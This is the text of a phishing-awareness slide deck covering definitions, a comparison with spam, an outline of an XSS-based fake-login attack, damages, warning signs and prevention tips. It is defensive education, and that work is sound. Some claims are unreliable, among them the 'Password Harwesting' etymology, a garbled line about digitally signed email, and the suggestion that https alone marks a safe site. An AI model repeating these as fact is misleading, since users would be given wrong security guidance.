2. PHISHING BASICS
•The word has its origin from two words “Password Harwesting”
or fishing for Passwords.
•Phishing is the attempt to obtain sensitive information such as
usernames, passwords, and credit card details (and sometimes,
indirectly, money), often for malicious reasons, by masquerading
as a trustworthy entity in an electronic communication.
•Also known as “brand spoofing”
•Phishers are phishing artists.
•Phishing techniques was described
in detail in the year 1987 and this
Technique was first used in the year
1995
3. Phishing Definition
•Phishing is the attempt to obtain sensitive
information such as usernames, passwords, and
credit card details (and sometimes, indirectly,
money), often for malicious reasons, by
masquerading as a trustworthy entity in an electronic
communication.
•It tries to trick users with official looking messages
•Credit card
•Bank account
•eBay
•PayPal
•Some phishing emails also contain malicious or
unwanted software that can track your activities or
slow your computer.
4. Comparison To Spam
•The purpose of a phishing message is to acquire
sensitive information about a user. For doing so the
message needs to deceive the intended recipient.
•So it doesn’t contains any useful information
and hence falls under the category of spam.
•A spam message tries to sell a product or service,
whereas phishing message needs to look like it is from a
legitimate organization.
•Techniques applied to spam message can’t be applied
naively to phishing messages.
5. Existing System
•Detect and block the phishing websites in
time.
•Enhance the security of the websites
•Block the phishing emails by various spam
filters.
•Install online anti-phishing software in user’s
computers.
7. How Phishing Attack
•Hacker embeds fake login form to XSS vulnerable page.
It might be online shop, internet banking, payment
system, etc
•Hacker sends Email with the link to this transformed
page(actually link contains HTML injection code as a
parameter). This email looks pretty similar to emails
typically sent from this website to registered users(only
without user name in greeting)
•User clicks the link and opens fake web-page. If user
enters his username and password to login , all of their
account details will be sent to hackers web-server.
•User may not notice anything strange because real
“home” or “Welcome” pages are what he was expecting
to see.
9. Damages Caused By Phishing
•The damage caused by phishing ranges from loss of access to
email to substantial financial loss. This style of identity theft is
becoming more popular, because of the ease with which
unsuspecting people often divulge personal information to
phishers, including credit card numbers, social security numbers,
and mothers maiden names. There are also fears that identity
thieves can obtain some such information simply by accessing
public records. Once they have the information they need and
want, the phishers will use that person’s details to create fake
accounts using the victims name, using up a persons credit. Or
even prevent the victim from accessing to their own accounts.
11. How Does a Phishing Email
Message look like?!!
•Spelling and bad grammar. Cybercriminals are not known
for their grammar and spelling.
•Beware of links in email. If you see a link in a suspicious
email message, don’t click on it.
•Threats. Have ever received a threat that your Hotmail
account would be closed if you didn’t respond to an email
message? The email message shown in the next slide is an
example of the same trick.
•Spoofing popular websites or companies, scam artist use
graphics in an email that appear to be connected to
legitimate websites but actually take you to phony scam
sites or legitimate-looking pop-up windows.
15. Prevention to be taken to avoid
Phishing
•Prevention: What to do
•Protect your computer with anti-virus software,
spyware filters, e-mail filters, and firewall programs,
and make sure that they are regularly updated.
•Ensure that your Internet browser is up to date and
security patches applied.
•Avoid responding any unknown email or giving your
financial information to that email.
•Unless the email is digitally signed, it should also be
fake.
•Phishers typically ask for information such as
usernames, passwords, credit card numbers, social
security numbers, etc.
16. Prevention to be taken to avoid Phishing
•Phishers typically are typically not personalized, while valid
message from your bank or e-commerce company are generally
personalized.
•Always ensure that you’re using a secure website when
submitting credit card or other sensitive information via your
Web Browser.
•To make sure you’re on a secure Web server, check the
beginning of the Web address bar –it should be “https:// “rather
just ” http://”.
•Regularly log into your online accounts. Don’t leave them for a
long period of time.
•Regularly check your bank, credit and debit card statements to
ensure that all transaction are legitimate.
•If anything is suspicious, contact your bank and all card issuers.
17. Prevention: What not to do
•Don’t assume that you can correctly identify a
website as legitimate by just looking at it.
•Don’t use the links in an email to get to any web
page, if you think that the message might not be
authentic.
•Log onto the website directly by typing in the web
address in your browser.
•Avoid filling out forms in email messages that ask for
personal financial information.
•You should only communicate information such as
credit card numbers or account information via a
secure website or the telephone.
18. Conclusion
•Phishing is identity theft. It is fraud. It masquerades as
legitimate and trustworthy entities in order to obtain sensitive
data. It then uses it to “rip off” the misled user with often tragic
consequences.
•Phishing is a form of criminal conduct that poses increasing
threats to consumers, financial institution and commercial
enterprises in Canada, united States, and other countries.
Because phishing shows no sign of abating, and indeed is likely
to continue in newer and more sophisticated forms, law
enforcement, other countries will need to cooperate more
closely than ever in their efforts to combat phishing, through
improved public education, prevention, authentication, and
binational and national enforcement efforts.